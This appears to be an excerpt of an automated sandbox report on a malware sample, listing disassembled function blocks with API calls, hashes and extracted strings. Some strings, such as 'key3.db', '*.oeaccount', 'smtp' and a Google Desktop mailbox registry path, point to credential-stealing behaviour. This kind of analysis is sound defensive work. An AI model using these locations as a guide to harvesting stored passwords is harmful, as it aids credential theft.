                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                    • API String ID: 2221118986-2852464175
                                                                                                                                                                                                                                    • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                                                    • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                                    • API String ID: 3510742995-3170954634
                                                                                                                                                                                                                                    • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                                                    • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                    • API String ID: 231171946-3708268960
                                                                                                                                                                                                                                    • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                                                                    • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                                    • String ID: winWrite1$winWrite2
                                                                                                                                                                                                                                    • API String ID: 438689982-3457389245
                                                                                                                                                                                                                                    • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                                                    • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                                    • String ID: winRead
                                                                                                                                                                                                                                    • API String ID: 1297977491-2759563040
                                                                                                                                                                                                                                    • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                                    • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                                    • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                                    • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75C50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75C50A60), ref: 00406D4D
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                                                                                      • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                                      • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                                      • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                                    • API String ID: 3337535707-2769808009
                                                                                                                                                                                                                                    • Opcode ID: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                                                                                                                                    • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                                                                    • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                                    • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                                                                                      • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                                                                                                      • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                                                                                      • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                                      • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                                      • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                                      • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                                    • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                                                                                                                                                                    • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                                                                                                                                                                    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2374668499-0
                                                                                                                                                                                                                                    • Opcode ID: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                                                                                                                                                                    • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75C50A60,?,00000000), ref: 00409A3E
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75C50A60,?,00000000), ref: 00409A4C
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75C50A60,?,00000000), ref: 00409A5D
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75C50A60,?,00000000), ref: 00409A74
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75C50A60,?,00000000), ref: 00409A7D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                                    • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                                                                                                                                                    • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75C50A60,?,00000000), ref: 00409A3E
                                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75C50A60,?,00000000), ref: 00409A4C
                                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75C50A60,?,00000000), ref: 00409A5D
                                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75C50A60,?,00000000), ref: 00409A74
                                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75C50A60,?,00000000), ref: 00409A7D
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                                                                                                                                    • free.MSVCRT ref: 00409B00
                                                                                                                                                                                                                                      • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??3@$free
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2241099983-0
                                                                                                                                                                                                                                    • Opcode ID: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                                                                                                                                                                                                    • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                                                                      • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                                                                      • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2775283111-0
                                                                                                                                                                                                                                    • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                                                                    • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                                                                                                                                                                      • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                                                                                                                                      • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                                                                                                                                                                                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                    • String ID: Ul@$key3.db
                                                                                                                                                                                                                                    • API String ID: 1968906679-1563549157
                                                                                                                                                                                                                                    • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                                                                    • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                                                                    • String ID: smtp
                                                                                                                                                                                                                                    • API String ID: 2625860049-60245459
                                                                                                                                                                                                                                    • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                                                                                                                                    • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408258
                                                                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                                                                    Memory Dump Source
